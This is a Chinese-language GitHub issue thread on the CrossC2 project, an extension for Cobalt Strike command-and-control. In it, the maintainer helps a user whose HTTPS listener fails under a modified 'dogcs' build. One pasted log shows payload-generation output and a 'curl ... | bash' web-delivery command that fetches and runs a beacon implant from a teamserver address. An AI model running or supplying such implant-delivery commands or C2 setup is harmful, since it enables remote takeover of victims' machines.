### ISSUE TITLE
获取不到监听器

### ISSUE THREAD

**Issue by r00t7oo2jm** [gloxec/CrossC2#189]
<img width="909" alt="图片" src="https://user-images.githubusercontent.com/90321909/217025566-2c6bfbe8-db22-4794-8d6d-2d482b7cc8cb.png">

4.4和4.5版本创建完https监听后都获取不到。
请问下这是什么问题？

**Comment by r00t7oo2jm** [comment]
dogcs版本

**Comment by gloxec** [comment]
贴下 event 界面的输出信息，可能是配置错误生成失败，或者生成后还在向teamserver上传数据时被中断

**Comment by r00t7oo2jm** [comment]
大佬，可以付费帮忙远程解决吗，4.4可以4.5不行，4.4上线也遇到问题了

**Comment by gloxec** [comment]
直接贴下登陆后主界面event框中的信息提示，问题应该不复杂，测试cs4.7版本及以下都可正常使用

**Comment by r00t7oo2jm** [comment]
<img width="332" alt="图片" src="https://user-images.githubusercontent.com/90321909/217254464-49594a08-be3b-4150-a741-737121470f32.png">
<img width="859" alt="图片" src="https://user-images.githubusercontent.com/90321909/217254598-52baf766-f045-48a6-9ca7-d93ba6b4aa9d.png">

**Comment by r00t7oo2jm** [comment]
<img width="1166" alt="图片" src="https://user-images.githubusercontent.com/90321909/217255482-97714fa4-0923-4a4a-988f-cd5857d15a34.png">

**Comment by r00t7oo2jm** [comment]
已经换了4.7版本，完全没问题，我用的dogcs版本不行。感谢作者解答！

**Comment by gloxec** [comment]
> <img alt="图片" width="332" src="https://user-images.githubusercontent.com/90321909/217254464-49594a08-be3b-4150-a741-737121470f32.png">

图中控制台处未看到生成信息，应当可以看到下面类似信息，包含生成命令，生成文件大小
```
05/01 23:31:03 *** /mnt/cc2/genCrossC2.MacOS 172.16.251.1 5555 /tmp/beacon_keys null MacOS x64 /tmp/CrossC2-test
05/01 23:31:06 *** genCrossC2 beacon -> *[success] :    Packed 1532232 byte.
05/01 23:31:07 *** hook hosted CrossC2 beacon MacOS x64 @ http://172.16.251.1:55413/iqEBVKwHoZ
05/01 23:31:07 *** hook hosted Script Unix Web Delivery (curl) @ http://172.16.251.1:55413/a
05/01 23:31:07 *** CrossC2 MacOS x64:   curl -A o -o- -L http://172.16.251.1:55413/a | bash -s
```

建议检查 cna 以及 genCrossC2文件配置是否正确

**Comment by gloxec** [comment]
> <img alt="图片" width="859" src="https://user-images.githubusercontent.com/90321909/217254598-52baf766-f045-48a6-9ca7-d93ba6b4aa9d.png">

图中请求 `/load` URL请求为404, 应该是所使用的dogcs修改了默认的profile配置，建议解压dogcs所提供的cobaltstrike.jar，查看内置profile中`http-get`, `http-post`中的URI等。

按照首页介绍的 `rebind库` 配置，创建dogcs可用的通信。
